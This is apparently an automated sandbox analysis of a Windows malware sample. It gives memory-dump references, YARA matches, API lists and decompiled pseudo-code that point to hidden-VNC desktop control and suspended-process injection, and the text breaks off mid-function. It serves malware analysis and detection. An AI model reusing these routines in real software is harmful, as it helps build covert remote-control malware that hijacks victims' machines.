                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateObject$BitmapBrushDeletePatternStock
                                          • String ID:
                                          • API String ID: 247950882-0
                                          • Opcode ID: fbd72e68dee3bb9d9613acd2f11248c368d21638cb039d86f87925839b3a5438
                                          • Instruction ID: 071ceeb6d485c69a93ec53e766b9cf8a9e9120e60ce9b5a4485ad12e62316954
                                          • Opcode Fuzzy Hash: fbd72e68dee3bb9d9613acd2f11248c368d21638cb039d86f87925839b3a5438
                                          • Instruction Fuzzy Hash: C9F0B238705B4296FB148B65F858B6933A5B748B50F808238DA4E83BA0EF3C855EC709
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostProcessThread$CurrentWindow
                                          • String ID:
                                          • API String ID: 791361056-0
                                          • Opcode ID: bdc928c0b539d365fd630b75a229f0f97326912bd15685cfdde784c6e6d7dc61
                                          • Instruction ID: 0650827d829ad8f9ce61abd0293d833d5926b9825203aedf7a5b9066dbfbac15
                                          • Opcode Fuzzy Hash: bdc928c0b539d365fd630b75a229f0f97326912bd15685cfdde784c6e6d7dc61
                                          • Instruction Fuzzy Hash: 41F05833220B8187F7648B24F891F5A7261F789785F98A530EA6646E58DF38C998CB00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 23%
                                          			E00C7B650(void* __edx, void* __eflags, void* __rcx) {
                                          				void* _v56;
                                          				void* __rbx;
                                          				long _t10;
                                          				void* _t18;
                                          				void* _t19;
                                          				void* _t26;
                                          
                                          				_t19 = __rcx;
                                          				SetThreadDesktop(??);
                                          				_t10 = E00C7B290(__edx, _t18, __rcx, __rcx, _t26);
                                          				if(_t10 == 0) {
                                          					 *(_t19 + 0x220) = 1;
                                          					while( *((intOrPtr*)(_t19 + 0x224)) == 0) {
                                          						r9d = 0;
                                          						r8d = 0;
                                          						_t10 = GetMessageA(??, ??, ??, ??);
                                          						if(_t10 == 0) {
                                          							break;
                                          						}
                                          						TranslateMessage();
                                          						_t10 = DispatchMessageA(??);
                                          					}
                                          					 *(_t19 + 0x220) =  *(_t19 + 0x220) & 0x00000000;
                                          					return _t10;
                                          				}
                                          				return _t10;
                                          			}

                                          APIs
                                          • SetThreadDesktop.USER32 ref: 00C7B660
                                            • Part of subcall function 00C7B290: SetWindowLongPtrA.USER32 ref: 00C7B308
                                          • GetMessageA.USER32 ref: 00C7B68B
                                          • TranslateMessage.USER32 ref: 00C7B69A
                                          • DispatchMessageA.USER32 ref: 00C7B6A5
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Message$DesktopDispatchLongThreadTranslateWindow
                                          • String ID:
                                          • API String ID: 2425733056-0
                                          • Opcode ID: baecf8bf0c18c2995f3c4041deccb9cf531d0737bc3339354839140ff32036b0
                                          • Instruction ID: 59279c7d0a6c4b6cb3e8ace42eec1517d6c40243e0759768857b3a187fdb1be8
                                          • Opcode Fuzzy Hash: baecf8bf0c18c2995f3c4041deccb9cf531d0737bc3339354839140ff32036b0
                                          • Instruction Fuzzy Hash: 3DF05E72610541D3FB24AF71E858B6A3370F7A8B09F9C8230EA5E45964DF38C98DC708
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostThreadMessageA.USER32 ref: 00C7A939
                                          • WaitForSingleObject.KERNEL32(?,?,00000000,00C76899), ref: 00C7A94B
                                          • CloseHandle.KERNEL32(?,?,00000000,00C76899), ref: 00C7A955
                                          • HeapFree.KERNEL32(?,?,00000000,00C76899), ref: 00C7A967
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseFreeHandleHeapMessageObjectPostSingleThreadWait
                                          • String ID:
                                          • API String ID: 1797912655-0
                                          • Opcode ID: c616e90da385d56ac4a1fa86674a4e27149f87433ec362b95568232a1cf552a9
                                          • Instruction ID: ce1d2a595d9e20eab22dd7fffa35f522bf7a2a9eab7956cf174b8ce94c996dab
                                          • Opcode Fuzzy Hash: c616e90da385d56ac4a1fa86674a4e27149f87433ec362b95568232a1cf552a9
                                          • Instruction Fuzzy Hash: 91F01236612B4082FF18DF72E854B693321EBC4F55F58C6148E2A06AA4CF38D99AC755
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$CreateEventlstrcpy
                                          • String ID:
                                          • API String ID: 3695347688-0
                                          • Opcode ID: b182eaf9ddd73962192087f4c85a83136e21478fc6dd5697bd04ff6606cfa6b5
                                          • Instruction ID: 114beeddb6a5f8f41d04277e2f7eb1b49c50fa38f15114f4da3bf8858fa17ba3
                                          • Opcode Fuzzy Hash: b182eaf9ddd73962192087f4c85a83136e21478fc6dd5697bd04ff6606cfa6b5
                                          • Instruction Fuzzy Hash: 6AF0FEB631094A93FF259B24E895BDE2321FB48759F808227954E46964DF3CC64DC744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$CreateEventlstrcpy
                                          • String ID:
                                          • API String ID: 3695347688-0
                                          • Opcode ID: 3f9b447d7d13add017840ab49204b8261739b9f434c5a7c7d1ddc9914c7f2723
                                          • Instruction ID: 68516ddc8f118e246dbab92039671b8ab273aebcec7b093548dadc54166a0157
                                          • Opcode Fuzzy Hash: 3f9b447d7d13add017840ab49204b8261739b9f434c5a7c7d1ddc9914c7f2723
                                          • Instruction Fuzzy Hash: 36F05EB231090A93FF348B24E854B9A2321FB48758F808223954E46964DF3CC24DC744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCriticalDeleteHandleMessageObjectPostSectionSingleThreadWait
                                          • String ID:
                                          • API String ID: 3840051195-0
                                          • Opcode ID: bfcb56a2d90d0420cdb67d8af8efd1f50d670b84af6ee7061c6f5b586b9b295b
                                          • Instruction ID: 6f846afa69dd8e3c719a12184e912413731d91f16bf541e2bcadebc311f1e917
                                          • Opcode Fuzzy Hash: bfcb56a2d90d0420cdb67d8af8efd1f50d670b84af6ee7061c6f5b586b9b295b
                                          • Instruction Fuzzy Hash: F7F01236611A8482FB109F75D89DBA93361FB94F5DF584230CE25095A5CF34449AC718
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E00C822AC(void* __edx, void* __rax, long long __rbx, void* __rcx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
                                          				void* _v8;
                                          				signed char _v32;
                                          				signed int _v36;
                                          				void* _v68;
                                          				char _v72;
                                          				void* __rdi;
                                          				intOrPtr _t34;
                                          				signed int _t40;
                                          				signed int _t44;
                                          				signed int _t50;
                                          				signed int _t53;
                                          				void* _t67;
                                          				void* _t69;
                                          				intOrPtr* _t71;
                                          				void* _t79;
                                          				long long _t91;
                                          				void* _t95;
                                          				void* _t100;
                                          
                                          				_t105 = __r9;
                                          				_t96 = __rsi;
                                          				_t70 = __rbx;
                                          				_t69 = __rax;
                                          				_t56 = __edx;
                                          				_a8 = __rbx;
                                          				_a16 = __rbp;
                                          				_a24 = __rsi;
                                          				_t95 = __rcx;
                                          				E00C7F480(__rbx, __rcx);
                                          				r8d = 0;
                                          				_t34 = E00C82424(__edx, _t69, _t70, _t95, _t69, __rsi, __rbp, __r8, __r9);
                                          				_t71 =  *((intOrPtr*)(_t95 + 0x1d0));
                                          				_t57 = _t71;
                                          				if(_t71 != 0) {
                                          					_t5 = _t95 + 0x88; // 0x88
                                          					_t100 = _t5;
                                          					do {
                                          						E00C81D90(_t57, _t69, _t71, _t95, _t71, _t96);
                                          						_v72 = 0x3c;
                                          						_t96 =  *_t71;
                                          						if(E00C7C050(_t69, _t71, _t100, _t96, _t96) == 0 || GetWindowInfo() == 0) {
                                          							r8d = 0;
                                          							__eflags = r8d;
                                          							_t34 = E00C81C90(_t54, _t71, _t95, _t95, _t96, _t100, _t105);
                                          							_t71 =  *((intOrPtr*)(_t95 + 0x1d0));
                                          						} else {
                                          							_t91 = _t96;
                                          							_t79 = _t100;
                                          							_t40 = _v32 >> 0x00000003 & 0x00000001;
                                          							 *(_t71 + 0x2c) = _t40;
                                          							if(_t40 != 0) {
                                          								_t44 =  !(E00C7BB64(_t69, _t71, _t79, _t91, _t105) >> 7) & 0x00000001;
                                          								__eflags = _t44;
                                          								goto L17;
                                          							} else {
                                          								_t50 = E00C7BB64(_t69, _t71, _t79, _t91, _t105) >> 0x00000003 & 0x00000001;
                                          								 *(_t71 + 0x2c) = _t50;
                                          								if(_t50 == 0) {
                                          									if((_v32 & 0x00000080) == 0 || (_v36 & 0x40000000) == 0) {
                                          										_t53 = 0;
                                          										__eflags = 0;
                                          									} else {
                                          										_t53 = 1;
                                          									}
                                          									 *(_t71 + 0x2c) = _t53;
                                          								}
                                          								_t64 =  *(_t71 + 0x2c);
                                          								if( *(_t71 + 0x2c) == 0) {
                                          									if(E00C7C0C0(_t64, _t69, _t71, _t100,  *_t71, _t96) == 0) {
                                          										L15:
                                          										_t44 = 0;
                                          									} else {
                                          										E00C7F480(_t71, _t95);
                                          										if( *_t71 != _t69) {
                                          											goto L15;
                                          										} else {
                                          											_t44 = 1;
                                          										}
                                          									}
                                          									L17:
                                          									 *(_t71 + 0x2c) = _t44;
                                          								}
                                          							}
                                          							r8d = 0x10;
                                          							memcpy(??, ??, ??);
                                          							E00C821C8(_t56, _t71, _t95, _t71, _t96);
                                          							_t67 = E00C7C134(_t71, _t96);
                                          							_t54 = 0 | _t67 == 0x00000000;
                                          							 *(_t71 + 0x18) = _t67 == 0;
                                          							_t34 = E00C7BE8C( &_v72);
                                          							 *((intOrPtr*)(_t71 + 0x14)) = _t34;
                                          							_t71 =  *((intOrPtr*)(_t71 + 0x38));
                                          						}
                                          					} while (_t71 != 0);
                                          				}
                                          				return _t34;
                                          			}

                                          APIs
                                            • Part of subcall function 00C82424: EnterCriticalSection.KERNEL32 ref: 00C8246A
                                            • Part of subcall function 00C82424: LeaveCriticalSection.KERNEL32 ref: 00C82527
                                            • Part of subcall function 00C81D90: GetWindow.USER32 ref: 00C81DAD
                                            • Part of subcall function 00C7C050: IsWindow.USER32 ref: 00C7C06A
                                            • Part of subcall function 00C7C050: GetAncestor.USER32(?,?,?,00C7C19D), ref: 00C7C093
                                          • GetWindowInfo.USER32 ref: 00C8231E
                                          • memcpy.NTDLL ref: 00C823BA
                                            • Part of subcall function 00C7BB64: GetParent.USER32 ref: 00C7BCA4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$CriticalSection$AncestorEnterInfoLeaveParentmemcpy
                                          • String ID: <
                                          • API String ID: 4287079213-4251816714
                                          • Opcode ID: ac1a6207e7630e2fa460a872bb139aaaa16357cb7dbdb376a3a67c290a94e6f2
                                          • Instruction ID: 370c1024406bae2bed168fe06a37d3da31547f059ffa9132f631de7a45a5e15e
                                          • Opcode Fuzzy Hash: ac1a6207e7630e2fa460a872bb139aaaa16357cb7dbdb376a3a67c290a94e6f2
                                          • Instruction Fuzzy Hash: 8A31C272304A4086DB24EF36D45936E63A8F749FCCF488025EE1987B18DF2CC942DB48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 66%
                                          			E00C631C8(void* __ecx, void* __edx, void* __ebp, long long __rbx, signed long long __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32) {
                                          				void* _v32;
                                          				char _v40;
                                          				void* __r12;
                                          				void* _t20;
                                          				void* _t22;
                                          				void* _t23;
                                          				char _t27;
                                          				void* _t28;
                                          				intOrPtr _t33;
                                          				void* _t36;
                                          				void* _t37;
                                          				void* _t42;
                                          				long long _t46;
                                          				signed long long _t51;
                                          				signed long long _t62;
                                          				signed long long _t64;
                                          				intOrPtr _t69;
                                          				void* _t71;
                                          				signed long long _t72;
                                          				void* _t74;
                                          				WCHAR* _t76;
                                          				void* _t77;
                                          
                                          				_t59 = __rsi;
                                          				_t57 = __rdi;
                                          				_t46 = __rbx;
                                          				_t38 = __ebp;
                                          				_t28 = __ecx;
                                          				_t45 = _t64;
                                          				 *((long long*)(_t45 + 8)) = __rbx;
                                          				 *((long long*)(_t45 + 0x10)) = __rbp;
                                          				 *((long long*)(_t45 + 0x18)) = __rsi;
                                          				 *((long long*)(_t45 + 0x20)) = __rdi;
                                          				_t62 = __rcx;
                                          				r14d = r9d;
                                          				_t77 = __r8;
                                          				_t37 = __edx;
                                          				GetModuleHandleW(_t76);
                                          				r8d = 0;
                                          				_t72 = _t45;
                                          				_t20 = E00C632B4(r14d, __ebp, __rbx, __r8, __rdi, __rsi, __rcx, __r8, _t72, _t74, _t71);
                                          				_t27 = 0;
                                          				_t36 = _t20;
                                          				if(_t20 == 0) {
                                          					_v32 = _t46;
                                          					_v40 = 0;
                                          					_t22 = GetCurrentProcess();
                                          					_t51 = _t45;
                                          					_t23 = E00C64A4C(_t22, _t45, _t46, _t51,  &_v32, _t62,  &_v40);
                                          					_t36 = _t23;
                                          					if(_t23 != 0) {
                                          						E00C62CD0(_t28, r14d, _t46, _t77, _t59);
                                          					} else {
                                          						_t33 = _v40;
                                          						if(_t33 != 0) {
                                          							do {
                                          								_t45 = _v32;
                                          								_t69 =  *((intOrPtr*)(_v32 + _t51 * 8));
                                          								_t42 = _t69 -  *0xc95688; // 0xc60000
                                          								if(_t42 != 0 && _t69 != _t72) {
                                          									_t51 = _t62;
                                          									E00C632B4(_t37, _t38, _t46, _t51, _t57, _t59, _t62, _t69, _t72);
                                          									_t33 = _v40;
                                          								}
                                          								_t27 = _t27 + 1;
                                          							} while (_t27 < _t33);
                                          						}
                                          						E00C61E84();
                                          						E00C63374(_t37, _t45, _t46, _t62, _t59, _t62);
                                          					}
                                          				}
                                          				return _t36;
                                          			}

                                          APIs
                                          • GetModuleHandleW.KERNEL32(?,?,?,?,?,00C618B2,?,?,?,00C61F7A,?,?,?,00C6203D), ref: 00C631F7
                                            • Part of subcall function 00C632B4: GetModuleHandleA.KERNEL32(?,?,00000004,00C6320E,?,?,?,?,?,00C618B2,?,?,?,00C61F7A), ref: 00C632F6
                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,00C618B2,?,?,?,00C61F7A,?,?,?,00C6203D), ref: 00C6321F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: HandleModule$CurrentProcess
                                          • String ID: ADVAPI32.DLL
                                          • API String ID: 2298500976-33758204
                                          • Opcode ID: a448143bbdba2bc3cf407356ea0b42f9986c86b99d7ef4f9b864355493b20f06
                                          • Instruction ID: 6df0de90f213e73fc98a67ca1ba14ab47b522fd35a62bb4cc9ecbf2280c60274
                                          • Opcode Fuzzy Hash: a448143bbdba2bc3cf407356ea0b42f9986c86b99d7ef4f9b864355493b20f06
                                          • Instruction Fuzzy Hash: 2221D732704B9186DB309F56E8D031AB761F7C8FC4F584222AE8D57716CE38CA46C744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E00C618C8(void* __edx, void* __eflags, long long* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24, intOrPtr _a40, signed int _a48, long long _a56, long long _a64, long long _a72, long long _a80) {
                                          				void* _v24;
                                          				long long _v32;
                                          				long long _v40;
                                          				long long _v48;
                                          				long long _v56;
                                          				signed int _v64;
                                          				intOrPtr _v72;
                                          				void* _t25;
                                          				void* _t27;
                                          				void* _t30;
                                          				void* _t31;
                                          				long long* _t35;
                                          				void* _t48;
                                          				void* _t51;
                                          				void* _t62;
                                          				long long* _t63;
                                          				void* _t65;
                                          
                                          				_t35 = __rax;
                                          				_a8 = __rbx;
                                          				_a16 = __rbp;
                                          				_a24 = __rsi;
                                          				_t51 = __r9;
                                          				_t65 = __rdx;
                                          				_t27 = 0;
                                          				GetModuleHandleW(??);
                                          				E00C64B0C(_t30, _t31, __rax, __rbx, __rax, "CreateProcessA");
                                          				_t63 = _t35;
                                          				if(_t35 != 0) {
                                          					_t62 = _t51;
                                          					r8d = _a48;
                                          					_t48 = _t65;
                                          					_t49 = _a80;
                                          					r8d = r8d | 0x00000004;
                                          					_v32 = _a80;
                                          					_v40 = _a72;
                                          					_v48 = _a64;
                                          					_v56 = _a56;
                                          					_v64 = r8d;
                                          					_v72 = _a40;
                                          					_t25 =  *_t63();
                                          					_t27 = _t25;
                                          					if(_t25 != 0) {
                                          						r8d = 1;
                                          						E00C614F8(_a48, _t31, _t49, _t48, __r8, _t62);
                                          					}
                                          				}
                                          				return _t27;
                                          			}

                                          APIs
                                          • GetModuleHandleW.KERNEL32 ref: 00C618F5
                                            • Part of subcall function 00C64B0C: CreateFileA.KERNEL32 ref: 00C64B82
                                            • Part of subcall function 00C64B0C: SetFilePointer.KERNEL32 ref: 00C64B9C
                                            • Part of subcall function 00C64B0C: ReadFile.KERNEL32 ref: 00C64BC2
                                            • Part of subcall function 00C64B0C: CloseHandle.KERNEL32 ref: 00C64BE3
                                            • Part of subcall function 00C614F8: memset.NTDLL ref: 00C6152B
                                            • Part of subcall function 00C614F8: ReadProcessMemory.KERNEL32 ref: 00C615BA
                                            • Part of subcall function 00C614F8: ReadProcessMemory.KERNEL32 ref: 00C615E5
                                            • Part of subcall function 00C614F8: ReadProcessMemory.KERNEL32 ref: 00C61637
                                            • Part of subcall function 00C614F8: ReadProcessMemory.KERNEL32 ref: 00C61671
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Read$MemoryProcess$File$Handle$CloseCreateModulePointermemset
                                          • String ID: CreateProcessA$KERNEL32.DLL
                                          • API String ID: 671254618-1218825259
                                          • Opcode ID: a8ee269e1e50c6c2cea735b85db4ea29fb83acd7fe862deee5ce252c5eb939bf
                                          • Instruction ID: 8ff072843a6f4279a54280199c0ac1614946b15737ce9b1863a6efaae4f6bbf2
                                          • Opcode Fuzzy Hash: a8ee269e1e50c6c2cea735b85db4ea29fb83acd7fe862deee5ce252c5eb939bf
                                          • Instruction Fuzzy Hash: F1113736318B808AD760CB12F880B9AB7A4F788BD0F588525EE8C43B19DF39C545CB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlInitUnicodeString.NTDLL ref: 00C68086
                                          • RtlCompareUnicodeString.NTDLL ref: 00C680A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: StringUnicode$CompareInit
                                          • String ID: \ThemeApiPort
                                          • API String ID: 2360956377-4099707584
                                          • Opcode ID: e1e8cc18aee7b1e519954776ce5b83c942aac4cb9db243cc113e578a1bb78b7b
                                          • Instruction ID: 13793d81ed8b827fe18058a05d80f35dc4ffe1723f91a695c7c5b01f912d6f7e
                                          • Opcode Fuzzy Hash: e1e8cc18aee7b1e519954776ce5b83c942aac4cb9db243cc113e578a1bb78b7b
                                          • Instruction Fuzzy Hash: 32112A36204F8485EA208B16F88475AB364F798FD4F488225EE8D87B29DF38C555CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00C7B9E4: GetClassNameA.USER32 ref: 00C7B9F6
                                          • GetWindowTextA.USER32 ref: 00C82193
                                          • lstrcmpA.KERNEL32 ref: 00C821A5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ClassNameTextWindowlstrcmp
                                          • String ID: #hvnc
                                          • API String ID: 876077961-3244826380
                                          • Opcode ID: ba365d1018cdf7add8b23b40c1ca27cd25252d9bc59d3a52f8cd87c46010c9af
                                          • Instruction ID: 1b250f5b1ea8d925fcbbb71bfa4c857ba78e88056c818628ca8c0bbb3fa630c0
                                          • Opcode Fuzzy Hash: ba365d1018cdf7add8b23b40c1ca27cd25252d9bc59d3a52f8cd87c46010c9af
                                          • Instruction Fuzzy Hash: CDF0F03230868582EB209F19E6C87AC2370F344BC8F9481399B4842625CF38CA4A8B04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetClassNameA.USER32 ref: 00C7BF36
                                          • lstrcmpiA.KERNEL32(?,?,?,?,00000000,00C699DE), ref: 00C7BF4C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ClassNamelstrcmpi
                                          • String ID: #32770
                                          • API String ID: 1927859406-463685578
                                          • Opcode ID: 4ce52cd7cf3a2d8017cf7f87db631fca651daa3e09f2453241d83787d13757d0
                                          • Instruction ID: 578f04d5a8bca4e7f7993c14f95ddc98b536dedece8e5d4f1109fdb4ddbf1e04
                                          • Opcode Fuzzy Hash: 4ce52cd7cf3a2d8017cf7f87db631fca651daa3e09f2453241d83787d13757d0
                                          • Instruction Fuzzy Hash: 0BF0F45622928186E7318F75A840766B761F758704F888226E98C87665EF3CC60DDB1D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 63%
                                          			E00C6B944(void* __edx, signed int* __rax, void* __rcx, signed int* __r8, void* __r10, void* __r11, signed char _a16, signed int* _a24, signed int _a32, signed short _a36, signed short _a38) {
                                          				signed int _v72;
                                          				signed int _v76;
                                          				intOrPtr _v80;
                                          				signed int _v84;
                                          				signed int _v88;
                                          				char _v96;
                                          				signed int _v100;
                                          				signed int _v104;
                                          				void* __rbx;
                                          				void* __rdi;
                                          				void* __rsi;
                                          				void* __rbp;
                                          				void* _t74;
                                          				int _t76;
                                          				signed int _t121;
                                          				signed int _t122;
                                          				void* _t129;
                                          				void* _t130;
                                          				void* _t134;
                                          				void* _t138;
                                          				signed int _t152;
                                          				signed int _t158;
                                          				signed int* _t192;
                                          				void* _t194;
                                          				signed int* _t224;
                                          				void* _t225;
                                          				void* _t227;
                                          				signed int* _t230;
                                          				void* _t238;
                                          				void* _t239;
                                          				signed int* _t240;
                                          				signed int* _t241;
                                          
                                          				_t239 = __r11;
                                          				_t238 = __r10;
                                          				_t230 = __r8;
                                          				_t194 = __rcx;
                                          				_t192 = __rax;
                                          				_t226 = _t227;
                                          				_t176 = 0;
                                          				_t225 = __rcx;
                                          				_a24 = _t224;
                                          				_t3 =  &(_t224[0]); // 0x1
                                          				r8d = _t3;
                                          				_t75 = E00C6BD0C(_t74, 0, _t193, __rcx,  &_a16, _t224, __rcx, _t227);
                                          				if(_t75 == 0) {
                                          					r12d = 0xff00;
                                          					do {
                                          						_t152 = _a16 & 0x000000ff;
                                          						_t122 = _t152;
                                          						if(_t152 == 0) {
                                          							r8d = 0x14;
                                          							_t75 = E00C6BD98(_t152, _t192, _t193, _t225, _t225, _t230,  &_a24);
                                          							__eflags = _t75;
                                          							if(_t75 != 0) {
                                          								goto L29;
                                          							} else {
                                          								_t224 = _a24;
                                          								_t193 =  &(_t224[1]);
                                          								_t224[2] = _t224[2] & 0x000000ff | (_t224[2] & 0x0000ffff) << 0x00000008;
                                          								_t224[2] = _t224[2] & 0x000000ff | (_t224[2] & 0x0000ffff) << 0x00000008;
                                          								_t224[3] = _t224[3] & 0x000000ff | (_t224[3] & 0x0000ffff) << 0x00000008;
                                          								asm("movups xmm0, [ebx]");
                                          								asm("movdqu [esi+0x70], xmm0");
                                          								E00C6C5B0( &(_t224[1]), _t225,  &_a24);
                                          								E00C6C028(_t192,  &(_t224[1]), _t225, _t226, _t230, _t238);
                                          								_t75 = E00C7D4E4();
                                          							}
                                          						} else {
                                          							_t129 = _t122 - 2;
                                          							if(_t129 == 0) {
                                          								r8d = 4;
                                          								_t75 = E00C6BD98(_t152, _t192, _t193, _t225, _t225, _t230,  &_a24);
                                          								__eflags = _t75;
                                          								if(_t75 != 0) {
                                          									goto L29;
                                          								} else {
                                          									_t224 = _a24;
